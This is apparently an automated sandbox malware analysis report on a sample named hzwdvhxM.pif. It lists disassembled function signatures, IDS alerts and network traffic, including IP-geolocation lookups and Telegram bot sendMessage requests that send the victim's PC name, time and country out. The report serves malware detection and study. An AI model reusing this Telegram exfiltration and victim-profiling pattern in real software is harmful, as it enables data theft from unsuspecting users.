        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D43E654h7_2_2D43E3A8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D43D4F4h7_2_2D43D248
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D433326h7_2_2D433254
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_2D430676
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D43DDA4h7_2_2D43DAF8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D43D94Ch7_2_2D43D6A0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6296F3h7_2_2D629420
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D62673Ch7_2_2D626490
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D628320h7_2_2D627FE0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D620FF4h7_2_2D620D48
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D62E3F1h7_2_2D62E120
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then mov esp, ebp7_2_2D62B52A
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6218A4h7_2_2D6215F8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D62144Ch7_2_2D6211A0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D62E889h7_2_2D62E5B8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D62C861h7_2_2D62C590
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D62370Ch7_2_2D623460
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D62BF31h7_2_2D62BC60
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6202ECh7_2_2D620040
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6262E4h7_2_2D626038
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6232B4h7_2_2D623008
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D62FAE9h7_2_2D62F818
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D626B96h7_2_2D6268E8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D620B9Ch7_2_2D6208F0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D62C3C9h7_2_2D62C0F8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D623B64h7_2_2D6238B8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D62DF59h7_2_2D62DC88
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D620744h7_2_2D620498
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D62D629h7_2_2D62D358
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D622A04h7_2_2D622758
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6255DCh7_2_2D625330
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6279DCh7_2_2D627730
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6225ACh7_2_2D622300
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D625E8Ch7_2_2D625BE0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D62DAC1h7_2_2D62D7F0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D62BA99h7_2_2D62B7C8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D622E5Ch7_2_2D622BB0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D62F651h7_2_2D62F380
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D625A34h7_2_2D625788
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D627E34h7_2_2D627B88
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D62ED21h7_2_2D62EA50
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D621CFCh7_2_2D621A50
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D62CCF9h7_2_2D62CA28
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D62F1B9h7_2_2D62EEE8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D62D191h7_2_2D62CEC0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D625184h7_2_2D624ED8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D627584h7_2_2D6272D8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D622154h7_2_2D621EA8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D62712Ch7_2_2D626E80
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D624D2Ch7_2_2D624A80
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D696882h7_2_2D696510
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D696EB3h7_2_2D696BB8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D690311h7_2_2D690040
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D69D31Bh7_2_2D69D020
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D69B66Bh7_2_2D69B370
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D690C41h7_2_2D690970
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D695A19h7_2_2D695748
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D697843h7_2_2D697548
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D69E63Bh7_2_2D69E340
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D692C29h7_2_2D692958
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D69CE53h7_2_2D69CB58
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6939F1h7_2_2D693720
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D691A09h7_2_2D691738
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D69902Bh7_2_2D698D30
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D69BFFBh7_2_2D69BD00
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D69A813h7_2_2D69A518
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D695EB1h7_2_2D695BE0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D69ACDBh7_2_2D69A9E0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6994F3h7_2_2D6991F8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6930C1h7_2_2D692DF0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D69C4C3h7_2_2D69C1C8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D691EA1h7_2_2D691BD0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D69869Bh7_2_2D6983A0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D693E89h7_2_2D693BB8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D69DCABh7_2_2D69D9B0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D699E83h7_2_2D699B88
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D694C51h7_2_2D694980
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D69F493h7_2_2D69F198
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D692312h7_2_2D692068
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D698B63h7_2_2D698868
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D69F95Bh7_2_2D69F660
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D696349h7_2_2D696078
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D69E173h7_2_2D69DE78
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D694321h7_2_2D694050
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D69A34Bh7_2_2D69A050
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D69BB33h7_2_2D69B838
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D69EB03h7_2_2D69E808
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6910D9h7_2_2D690E08
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6950EAh7_2_2D694E18
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D697D0Bh7_2_2D697A10
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D69D7E3h7_2_2D69D4E8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6947B9h7_2_2D6944E8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D692791h7_2_2D6924C0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6999BBh7_2_2D6996C0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6907A9h7_2_2D6904D8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6981D3h7_2_2D697ED8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D69EFCBh7_2_2D69ECD0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D69B1A3h7_2_2D69AEA8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D691571h7_2_2D6912A0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D695581h7_2_2D6952B0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D693559h7_2_2D693288
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D69737Bh7_2_2D697080
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D69C98Bh7_2_2D69C690
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6C2983h7_2_2D6C2688
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6C1663h7_2_2D6C1368
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6C0803h7_2_2D6C0508
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6C24BBh7_2_2D6C21C0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6C0CCBh7_2_2D6C09D0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6C033Bh7_2_2D6C0040
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6C1B2Bh7_2_2D6C1830
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6C1FF3h7_2_2D6C1CF8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D6C1194h7_2_2D6C0E98
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then mov ecx, 000003E8h7_2_2D84FE58
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_2D8451F0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_2D842061
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_2D841D38
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_2D841D48
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then mov ecx, 000003E8h7_2_2D84FE48
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_2D8451DF
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then push 00000000h7_2_2E2E11B8

        Networking

        barindex
        Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49727 -> 149.154.167.220:443
        Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49752 -> 149.154.167.220:443
        Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49762 -> 149.154.167.220:443
        Source: unknownDNS query: name: api.telegram.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2018/02/2025%20/%2014:26:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2018/02/2025%20/%2018:40:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2018/02/2025%20/%2015:06:25%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
        Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
        Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknownDNS query: name: checkip.dyndns.org
        Source: unknownDNS query: name: reallyfreegeoip.org
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49709 -> 132.226.8.169:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49746 -> 132.226.8.169:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 132.226.8.169:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49735 -> 132.226.8.169:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49730 -> 132.226.8.169:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49742 -> 132.226.8.169:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49706 -> 132.226.8.169:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49725 -> 132.226.8.169:80
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49712 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49750 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49708 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49733 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49723 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49729 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49731 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49741 -> 104.21.32.1:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49755 -> 104.21.32.1:443
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49707 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49728 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49738 version: TLS 1.0
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
